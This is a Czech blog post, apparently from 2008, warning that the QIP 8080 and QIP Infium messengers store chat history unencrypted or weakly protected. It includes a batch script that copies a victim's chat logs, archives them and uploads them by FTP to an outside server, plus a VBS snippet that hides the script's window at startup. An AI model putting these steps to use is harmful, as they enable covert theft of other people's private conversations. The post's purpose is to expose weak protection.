Kategorie: IT

Historie v QIP 8080 a QIP Infium 9020 - nezabezpečeno!

Po problémech které jsou poslední dobou častější a častější jsem se rozhodl začít využívat i jiné protokoly než icq. Nemůžu říci že jsem přešel na jabber, ale začal jsem ho používat ve stejné míře… S jabberem jsem se dostal také k IM qip infium – porovnával jsem a tady máte můj názor…

Autor: KdoSiOdJinud | Vydáno: 16.12.2008 14:55 | Přečteno: 16308x | Komentářů: 0
Porovnával jsem hlavně řešení historie.

QIP 8080:

Ukládá historii do *.txt s tím, že log není vůbec šifrovaný, každý kdo si tedy zkopíruje soubory ze složky ( defaultně ):

C:\Program Files\QIP\Users\icq_cislo\History

… může pohodlně vidět veškeré vaše rozhovory! Přitom pro zkopírování stačí jednoduchý scritpík (dá-li se tomu tak říkat), který by mohl vypadat třebas takto:

copy "C:\Program Files\QIP\Users\icq_cislo\History\*.txt"

… spuštěný z flash disku během vteřiny „ukradne“ veškeré rozhovory, při malém vylepšení, které by mohlo vypadat takto:

copy "C:\Program Files\QIP\Users\204324253\History\*.txt"
rar a "%date%-%username%-%random%.rar" *.txt
ftp
open www.vas_hosting.cz 21
vas _hosting
heslo_pro_hosting
mput "*.rar"

disconnect
quit

… tento scriptik pro změnu může odeslat historii na vaše ftp, není řešen firewall! Když pak dáme takový skript do pospuštění, můžem ztropit dost problémů, proto to raději nedělejme… Při spuštění tohoto skriptu po startu windows nám na obrazovce problikne okno cmd, to můžem vyřešit supuštěním přes vbs soubor nejiný tomuto:

Set ws = Wscript.CreateObject("Wscript.Shell")
ws.Run "první_soubor.cmd", 0



A jak je na tom tedy historie uložená v pc IM qip infium?

Je to lepší, ale stále děsivé! Historie nejde číst v poznámkovém bloku jako u qip 8080, nemá koncovku *.txt ale *.qhf a najdeme ji (u win vista v defaultním nastavení) tady:

C:\Users\uzivatel_win\AppData\Roaming\QIP\Profiles\icq_cislo\History

Při pokusu oteřít soubor *.ghf v poznámkovém bloku budem zklamáni, ze změti znaků se dozvíme tak akorát nick a uin od kterého je historie logována… Když ale soubor s cizí historii načtem přes jakýkoliv účet u qip infium, historie bude krásně čitelná, z toho plyne míra zabezpečení! Je o něco větší než u 8080 ale stále limitující nulu – nejde mluvit o zabezpečení! Způsob „ukradení“ historie by byl téměř totožný s 8080…

To by bylo k historii – prozatím ji neukládám a ani to neplánuji, uvidíme časem třebas se v budoucnu něco změní…

Komentáře rss

Pokud hledáte službu či máte dotaz mimo téma článku, využijte prosím sekci Nabídky / poptávky.


Nebyly přidány žádné komentáře.